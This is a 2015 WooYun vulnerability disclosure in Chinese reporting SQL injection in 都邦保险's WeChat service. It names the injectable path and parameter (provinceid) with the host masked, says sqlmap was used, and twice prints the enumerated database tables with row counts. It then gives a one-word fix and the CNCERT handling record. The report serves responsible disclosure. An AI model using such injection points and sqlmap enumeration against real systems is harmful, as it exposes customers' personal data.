当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142196

漏洞标题:都邦保险某重要站点存在sql注入可导致几十万信息泄漏

相关厂商:都邦保险

漏洞作者: 路人甲

提交时间:2015-09-24 09:09

修复时间:2015-11-12 15:36

公开时间:2015-11-12 15:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-28: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-08: 细节向核心白帽子及相关领域专家公开
2015-10-18: 细节向普通白帽子公开
2015-10-28: 细节向实习白帽子公开
2015-11-12: 细节向公众公开

简要描述:

都邦保险又报注入了

详细说明:

注入点
http://**.**.**.**/DBWechat/weixin/network.do?mhd=getcity&provinceid=1
注入参数是provinceid
sqlmap跑一下

4.jpg


Database: WECHAT
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| T_WX_MSG_MAIN | 316249 |
| T_WX_MSG_EVENT | 95542 |
| T_WX_USER | 38802 |
| T_WX_INTERFACE_LOG | 28609 |
| T_WX_ACTIVITY_LOG | 11402 |
| T_WX_USER_REG | 7966 |
| T_WX_MSG_REP_EXC | 4899 |
| T_WX_TASK_MSG | 4219 |
| T_WX_PAY_MISSION | 3933 |
| T_WX_ORDER | 3807 |
| T_WX_MSG_IMAGE | 2786 |
| T_WX_TASK_USER_STATE | 914 |
| T_WX_EVENT_TASK_MSG | 491 |
| CITYPHONE | 435 |
| T_WX_NETWORK | 392 |
| T_SYS_CITY | 391 |
| T_WX_NETWORK_ADDRESS | 387 |
| T_WX_NETWORK_ADDRESS_BEIFEN | 387 |
| ADDRESSCODE | 340 |
| T_WX_CLAIM_APPLICATION | 251 |
| T_WX_TASK_LIST | 213 |
| T_SYS_USER_MODULE | 137 |
| T_WX_DISPATCH_LIST | 119 |
| T_WX_ONLINE_MSG | 109 |
| T_WX_FIXFILE_MSG | 66 |
| T_SYS_USER | 59 |
| T_SYS_USER_ORGANIZATION | 58 |
| T_SYS_USER_ROLE | 57 |
| T_SYS_USER_ACCOUNT | 56 |
| T_SYS_ROLE_MODULE | 52 |
| T_SYS_MODULE_OPERATION | 34 |
| T_SYS_ORGANIZATION | 34 |
| T_SYS_PROVINCIAL | 34 |
| T_WX_ONLINE_LIST | 29 |
| T_SYS_MODULE | 26 |
| T_WX_MSG_VOICE | 22 |
| T_WX_MENU | 16 |
| T_WX_MSG_LOCATION | 7 |
| T_WX_PIC_INFO | 7 |
| T_WX_MATERIAL_INFO | 6 |
| T_SYS_ROLE | 5 |
| T_WX_FIX_FILE_LIST | 4 |
| T_WX_ACTIVITY | 2 |
| T_WX_ACTIVITY_PROPERTY | 2 |
| T_WX_MSG_VIDEO | 2 |
| T_SYS_KEYWORD | 1 |
| T_SYS_RETCOUNT | 1 |
| T_SYS_RULESET | 1 |
| T_WX_ACCOUNT | 1 |
+-----------------------------+---------+

漏洞证明:

Database: WECHAT
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| T_WX_MSG_MAIN | 316249 |
| T_WX_MSG_EVENT | 95542 |
| T_WX_USER | 38802 |
| T_WX_INTERFACE_LOG | 28609 |
| T_WX_ACTIVITY_LOG | 11402 |
| T_WX_USER_REG | 7966 |
| T_WX_MSG_REP_EXC | 4899 |
| T_WX_TASK_MSG | 4219 |
| T_WX_PAY_MISSION | 3933 |
| T_WX_ORDER | 3807 |
| T_WX_MSG_IMAGE | 2786 |
| T_WX_TASK_USER_STATE | 914 |
| T_WX_EVENT_TASK_MSG | 491 |
| CITYPHONE | 435 |
| T_WX_NETWORK | 392 |
| T_SYS_CITY | 391 |
| T_WX_NETWORK_ADDRESS | 387 |
| T_WX_NETWORK_ADDRESS_BEIFEN | 387 |
| ADDRESSCODE | 340 |
| T_WX_CLAIM_APPLICATION | 251 |
| T_WX_TASK_LIST | 213 |
| T_SYS_USER_MODULE | 137 |
| T_WX_DISPATCH_LIST | 119 |
| T_WX_ONLINE_MSG | 109 |
| T_WX_FIXFILE_MSG | 66 |
| T_SYS_USER | 59 |
| T_SYS_USER_ORGANIZATION | 58 |
| T_SYS_USER_ROLE | 57 |
| T_SYS_USER_ACCOUNT | 56 |
| T_SYS_ROLE_MODULE | 52 |
| T_SYS_MODULE_OPERATION | 34 |
| T_SYS_ORGANIZATION | 34 |
| T_SYS_PROVINCIAL | 34 |
| T_WX_ONLINE_LIST | 29 |
| T_SYS_MODULE | 26 |
| T_WX_MSG_VOICE | 22 |
| T_WX_MENU | 16 |
| T_WX_MSG_LOCATION | 7 |
| T_WX_PIC_INFO | 7 |
| T_WX_MATERIAL_INFO | 6 |
| T_SYS_ROLE | 5 |
| T_WX_FIX_FILE_LIST | 4 |
| T_WX_ACTIVITY | 2 |
| T_WX_ACTIVITY_PROPERTY | 2 |
| T_WX_MSG_VIDEO | 2 |
| T_SYS_KEYWORD | 1 |
| T_SYS_RETCOUNT | 1 |
| T_SYS_RULESET | 1 |
| T_WX_ACCOUNT | 1 |
+-----------------------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-28 15:34

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置。

最新状态:

暂无